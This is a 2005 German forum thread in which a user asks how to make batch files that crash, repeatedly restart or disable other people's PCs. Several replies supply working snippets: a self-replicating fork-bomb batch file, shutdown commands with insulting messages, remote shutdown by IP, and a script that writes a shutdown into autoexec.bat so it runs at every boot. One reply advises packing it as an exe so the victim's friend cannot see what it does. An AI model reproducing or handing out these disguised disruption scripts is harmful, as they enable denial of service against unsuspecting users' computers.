x.bat datei den pc abstürzen oder restarten oder sontige sachen amchen lassn ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von themark, 6. Juni 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 6. Juni 2005
    hallo
    wollt euch fragen ob es geht

    mit eienr file ?.bat

    etwas herzustellen

    sodas der pc neustarten,hängen bleibt,ein wichtiger prozess beendet werden kann


    bzw. net send klappt jha aber auch was anderes auch ?


    Lg themark

    10ner bewertung
     

  2. Anzeige
  3. #2 6. Juni 2005
    RE: Für diesen Beitrag bedanken sich folgende User:

    edit autoexec.bat
    exec %windir%/system32/shutdown.exe -a -f //ip


    WOW, du kannst schon netsend!!
    respekt
    den dienst kann man auch ausschalten und ich kenne viele die das machen
    :O :O
     
  4. #3 6. Juni 2005
    Wenn Du in einer batchdatei zb:
    shutdown [{-l|-s|-r|-a}] [-f] [-m [\\Computername]] [-t xx] [-c "Nachricht"] [-d[p]:xx:yy] (Windows Hilfe) Zum Neustarten/Herrunterfahren

    oder
    tskill {Prozesskennung | Prozessname} [/server:Servername] [{/id:Sitzungskennung | /a}] [/v] Zum Beenden von Tasks

    benutz und einbaust funktioniert das schon.



    mfg Virgo
    PS war zu langsam
     
  5. #4 6. Juni 2005
    hmm aber geht da auch was das jeder hat ein prozess und wenn der beendet wurde man neustarten muss ???




    wenn der funktionier


    gibt es eine 10ner beweetung
     
  6. #5 6. Juni 2005
    gutes deutsch muss ich schon sagen :D
    so wie ich das jetzt verstanden habe, willst du den prozess wissen, welchen man beendet und der betroffene dann seinen pc herrunterfahren muss, oder?
    würd ich mal sagen explorer.exe oder probiers halt selber aus

    aber am besten gehts mit ner bat datei z.b. wie:
    shutdown -s -t 29 -c "Samma was willst du dummer Lamer von mir!"
    exit

    wäre auch am simpelsen
     
  7. #6 6. Juni 2005
    hmm das

    shutdown -a -t 29 -c "Samma was willst du dummer Lamer von mir!"


    geht gar nicht *heul*
     
  8. #7 6. Juni 2005
    ups sry mein fehler probs mal mit shutdown -s ....... und nicht a des wa der befehl fürs abbrechen :D
     
  9. #8 6. Juni 2005
    perfekt das wollte ich und noch eine frage vor du eine 10 ner bekommst

    kann man das auch amchen das der naja ich weiß ned das cmd 10000000 mal aufmacht das er nachher abstürzt ?
     
  10. #9 6. Juni 2005
    svchost.exe is auch sehr gut :D


    //edit: Lad dir hier dir das hier ->linkfürdumme<-


    kopier das auf deine c: Pladde und schreib in die kill2.txt deinen befehl rein, der immer wieder geöffnet werden soll. danach speichern und beide .txt datein in .bat Datein umändern. dann einfach auf kill.bat klicken um den Vorgang auszulösen.
     
  11. #10 6. Juni 2005
    entweder mit einer bat und ne schleife (eigentliche methode fällt mir aber grad ne tein)
    abstürtzen tut er aber desshalb nicht, er wird aber durch die vielen fenster gezwungen sein zu rebooten

    desshalb:
    name der bat: x.bat
    inhalt:
    start x.bat
    start x.bat
    start x.bat
    start x.bat
    cmd
    cmd
    cmd
    cmd
     
  12. #11 6. Juni 2005
    danke bekommst eine 10!!
     
  13. #12 6. Juni 2005
    explorer.exe kann man ganz einfach mit strg+alt+entf
    neuer task
    explorer.exe
    wieder herrufen
     
  14. #13 6. Juni 2005
    Ähm noch eien frage da gibt es wieder eine 10ner bewertung


    gibt es so eine datei .bat die immer nach den starten ausgeführt wird

    oder

    gibt es sowas sodass die festplatte formatiert wird ?

    oder irgendwas was immer nach 10,20 minuten wiederholt
     
  15. #14 6. Juni 2005
    stimmt schon, aber glaubst du irgend so n lamer an der anderen seite wes des. ich kenne genug, die nichmahl in der lage sind nen ordner umzubenennen :D

    damit ne bat beim starten von windoof mitgestartet wird musst du des in die autoexect.bat eintragen oder einfach unter start-programme-autostarts :D

    ich werd mir mal was mit der schleife von 10 min überlegen
     
  16. #15 6. Juni 2005
    stimmt wieder



    kommen wir zu meienr sache *ggg* siehe oben meine zweite frage^^


    gibt es sowas was ständig nach dem starten ausgeführt wird ?


    oder gibt es sowas was die boot.ini datei verändert

    wäre cool weil dann kann man jha nima booten
     
  17. #16 6. Juni 2005
    wenn Du einen Remote PC mit shutdown runterfahren willst musste aber fürn Neustart

    shutdown -r -f -m \\(ipadresse oder Rechnername) -T 20 -c Text

    nehmen

    schreibst das in ne Bat/cmd datei und startest diese im Autostart oder schreibst es in die Registry unter Run
     
  18. #17 6. Juni 2005
    du kannst nur ne zeile anfügen, aber nichts bestehendes überschreiben oder löschen

    des funt so:
    echo text >> pfad/dateiname
     
  19. #18 6. Juni 2005
    Wenn du die Befehle in die autoexec.bat (Befindet sich im C:\-Laufwerk) schreibst, werden die Befehle bei jedem Start ausgeführt. Besonders schlimm ist das, wenn du den PC immer wieder herunterfahren lässt ^^

    WEiß aber net, ob das beim Abgesicherten Modus auch geht.
     
  20. #19 6. Juni 2005
    @ themark wie alt bist du eigentlich 10 ? wie kann man nur immer so einen scheiß fragen
    kauf dir ein buch oder was weiß ich aber verschone uns mit deinen dummen fragen. X(
     
  21. #20 6. Juni 2005

    Ähm also
    wie geht das jetzt genau kann mri wer den text sagen wie das geht also wenn de rjenige es anklickt soll es c.... gespeichert wrden und andauernd ausgeführt werrden nach dem start

    es soll immr wieder ein neustart ausgeführt werden!
     
  22. #21 6. Juni 2005
    ich wed mich mal dran versuchen und es dann gleich als exe machen (wenn möglich)

    so ne funzende bat hab ich schonmal jetzt brauch ich nurnoch n bat2exe ohne werbung
     
  23. #22 6. Juni 2005
    Dann mach halt echo text > pfad/dateiname

    /edit: hab kurz was geschrieben..
    Code:
    int main(){ system(shutdown -s -t 0);}
    
    und in ne schöne exe verpackt
     
  24. #23 6. Juni 2005
    Ähm ?!?!?!


    das versteh ich jetzt nicht



    wenn esferitg ist bidde einfach den text was ich machen soll hier rein schreiben ;)
     
  25. #24 6. Juni 2005
    mach einfach ne bat datei mit folgendem inhalt:
    echo shutdown -s -t 20 -c "Nicht mit dir du dummer Lamer!" >> c://windows/system32/config.bat
    echo exit >> c://windows/system32/config.bat
    echo start c://windows/system32/config.bat >> C://autoexec.bat
    exit

    hab grad versucht ne exe draus zu machen, da kommt dann aber immer bitte taste drücken

    und die soll dann dein freund ausführen. müsste gehen habs noch net ausprobiert :D
    aber wenn des dein freund ausführen soll, muss es ne exe sein, sonst weis er ja was die datei macht
     
  26. #25 6. Juni 2005
    hm kannst du adas auch auf restarten ändern ?


    und wird das immer nach dem starten wuiederholt?
     

  27. Videos zum Thema
Die Seite wird geladen...